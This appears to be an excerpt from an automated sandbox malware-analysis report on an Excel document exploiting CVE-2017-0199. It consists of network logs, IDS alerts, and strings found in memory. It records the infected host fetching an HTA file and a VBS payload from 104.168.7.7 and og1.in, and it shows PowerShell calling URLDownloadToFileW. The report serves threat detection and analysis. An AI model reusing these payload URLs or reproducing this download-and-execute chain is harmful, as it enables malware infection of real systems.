Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49168 -> 104.168.7.7:80
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 104.168.7.7:80 -> 192.168.2.22:49168
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 104.168.7.7:80
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 104.168.7.7:80 -> 192.168.2.22:49166

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Ts9zje HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Ts9zje HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /356/ce/IEnetbookupdateion.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /356/ce/IEnetbookupdateion.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 104.168.7.7If-Range: "1cecc-6234bd0fe5c83"
Source: global traffic	HTTP traffic detected: GET /356/IEnetbookupdation.vbs HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.7Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.7

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 7_2_000007FE899C7018 URLDownloadToFileW,

7_2_000007FE899C7018

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6ACC71F0.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /Ts9zje HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Ts9zje HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /356/ce/IEnetbookupdateion.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /356/ce/IEnetbookupdateion.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 104.168.7.7If-Range: "1cecc-6234bd0fe5c83"
Source: global traffic	HTTP traffic detected: GET /356/IEnetbookupdation.vbs HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.7Connection: Keep-Alive

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: og1.in

Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/
Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/IEnetbook
Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/IEnetbookupdation.vbs
Source: powershell.exe, 00000007.00000002.520144813.000000001A772000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/IEnetbookupdation.vbsiptor
Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/IEnetbookupdation.vbsp
Source: mshta.exe, 00000004.00000003.487027748.0000000000321000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486308977.0000000000321000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000321000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.hta
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.hta...Sm
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htac
Source: mshta.exe, 00000004.00000003.487358638.0000000002F65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htahttp://104.168.7.7/356/ce/IEnetbookupdateion.htaP
Source: mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htase
Source: mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htattingsk
Source: mshta.exe, 00000004.00000003.487027748.0000000000321000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htawwC:
Source: mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htaxo
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C270000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520144813.000000001A772000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000007.00000002.520144813.000000001A7A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.cr
Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000007.00000002.517798504.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/
Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.000000000034B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/Ts9zje
Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/Ts9zje#
Source: mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/Ts9zje.htalicy
